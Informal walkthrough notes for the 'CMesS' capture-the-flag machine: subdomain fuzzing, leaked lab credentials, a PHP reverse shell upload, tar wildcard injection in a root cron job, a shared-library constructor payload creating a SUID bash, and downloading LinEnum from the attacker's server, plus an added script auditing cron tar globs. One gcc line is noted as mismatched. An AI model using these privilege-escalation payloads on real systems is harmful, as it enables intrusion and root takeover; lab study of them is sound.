Challenge Machine (CMesS)

no easy or quick SQL angle found

directory busting?

admin page, but no way to log in or create an account.

subdomain? (needs an /etc/hosts entry)

wfuzz -c -f sub-fighter -w top5000.txt -u 'http://cmess.thm' -H "Host: FUZZ.cmess.thm" --hw 290

we found dev.cmess.thm

to make sure we can access it, we also have to add the subdomain to /etc/hosts

once we access it, we get these login credentials:

username: andre@cmess.thm
password: KPFTN_f2yxe%

we get access as admin and can manage files. Can we upload a PHP reverse shell?

uploaded it, but didn't see it.

create it instead?

can't access it

it uploaded into assets/.

NOT WORKING

make sure the copy-and-paste spacing is correct by recopying from the source

enumerate sudo rights and SUID binaries:

sudo -l
find / -type f -perm -04000 -ls 2>/dev/null

result:

new search (trace which files the SUID wrapper tries to open):

strace /usr/bin/vmware-user-suid-wrapper 2>&1 | grep -i -E "open|access|no such file"

result:

can we create a file in /etc?

__________________________________________________________________________________________________________

this might take too much time. Check cron jobs first:

cat /etc/crontab

result:

*/2 *   * * *   root    cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *

we can do checkpoints! (tar wildcard injection via --checkpoint-action)

make the payload file:

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > runme.sh

give it perms:

chmod +x runme.sh

exploit:

template:

tar czf /tmp/backup.tar.gz <do something>

in our case the cron runs:

tar -zcf /tmp/andre_backup.tar.gz *

but it cd's into the backup folder first, so we need to put runme.sh and the checkpoint files there as well!

touch /home/andre/backup/--checkpoint=1 
touch /home/andre/backup/--checkpoint-action=exec=sh\ runme.sh

note: we can come back to this later, but as the current user we can't touch files in andre's directory

now we keep checking until /tmp/bash is created:

ls -la /tmp

once it is, we can run it:

/tmp/bash -p

we have root!
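Added defensive example (not from the original notes): a small POSIX shell audit that flags a crontab command running tar against a bare `*` glob without a `--` end-of-options marker, counts option-looking filenames in the directory the job works in, and shows a hardened cron line that archives the directory with `-C dir .` so the shell never expands a glob into tar's argument list. The function names, the hardened line and the temporary test directory are my own constructions.

```sh
#!/bin/sh
# Added example, not from the original notes. Audits a cron command for the tar
# wildcard-injection pattern and demonstrates a hardened replacement.

# Crontab line taken from the notes above (constructed copy for the demo).
CRON_LINE='*/2 *   * * *   root    cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *'

# Hardened form (assumption: same schedule and output path). "-C dir ." archives
# the directory contents without a shell glob, so no filename can become an option.
SAFE_CRON='*/2 *   * * *   root    tar -zcf /tmp/andre_backup.tar.gz -C /home/andre/backup .'

# Prints VULNERABLE when the line runs tar with a "*" argument and no "--"
# before it, otherwise OK. Schedule fields before the tar word are ignored.
audit_cron_line() {
    set -f                     # disable globbing so the "*" in the line is not expanded here
    seen_tar=0; dashdash=0; verdict=OK
    for w in $1; do
        case "$w" in
            tar|*/tar)  seen_tar=1; dashdash=0 ;;
            '--')       if [ "$seen_tar" -eq 1 ]; then dashdash=1; fi ;;
            *'*'*)      if [ "$seen_tar" -eq 1 ] && [ "$dashdash" -eq 0 ]; then verdict=VULNERABLE; fi ;;
        esac
    done
    set +f
    echo "$verdict"
}

# Counts entries in a directory whose names start with "-": when a cron job
# globs that directory, these expand into tar options (e.g. --checkpoint-action).
find_option_files() {
    find "$1" -maxdepth 1 -name '-*' 2>/dev/null | wc -l | tr -d ' '
}

# Stand-alone demo: audit both lines, then scan a constructed temp directory
# seeded with the filenames used in the notes.
echo "original cron: $(audit_cron_line "$CRON_LINE")"
echo "hardened cron: $(audit_cron_line "$SAFE_CRON")"
demo_dir=$(mktemp -d)
touch "$demo_dir/--checkpoint=1" "$demo_dir/--checkpoint-action=exec=sh runme.sh" "$demo_dir/notes.txt"
echo "option-like filenames in $demo_dir: $(find_option_files "$demo_dir")"
rm -rf "$demo_dir"
```

The audit is intentionally simple (it only looks at tar and a literal `*`), but it catches the exact shape of the cron line on this box, and the option-file scan is the check to run on any directory a root cron job globs. Note that `tar ... -- *` also neutralises the trick, since names after `--` are never parsed as options, but `-C dir .` removes the glob entirely.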

__________________________________________________________________________________________________________

capabilities?

getcap -r / 2>/dev/null

result:

/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/mtr = cap_net_raw+ep

__________________________________________________________________________________________________________

back to shared object injection:

suid-debug.c (library payload; the constructor runs as soon as the library is loaded):

#include <stdio.h>
#include <stdlib.h>

/* marked as a constructor so it runs automatically at library load time */
static void inject() __attribute__((constructor));

void inject() {
	system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

the strace line that pointed here (an access() existence check on a plain file, not a library load):

access("/etc/suid-debug", F_OK)

steps taken:

cd /home/tmp/
nano suid-debug.c
ctrl+x
y
gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/libcalc.c
# note: the paths in this gcc line are copied from a generic template (libcalc) and do not match suid-debug.c above

doesn't work. Try LinPEAS or LinEnum?

transfer them: host the files on the attacking machine first, then fetch them on the target.

on the attacking machine, in the directory holding the scripts:

python3 -m http.server 8920

on the target:

wget http://10.6.62.12:8920/LinEnum.sh

what are the .bak files?

cat /opt/.password.bak

we get the ssh password for user andre:

ssh andre@10.10.234.116
password: UQfsdCB7aAP6

now we can go back and do the checkpoints! (see above)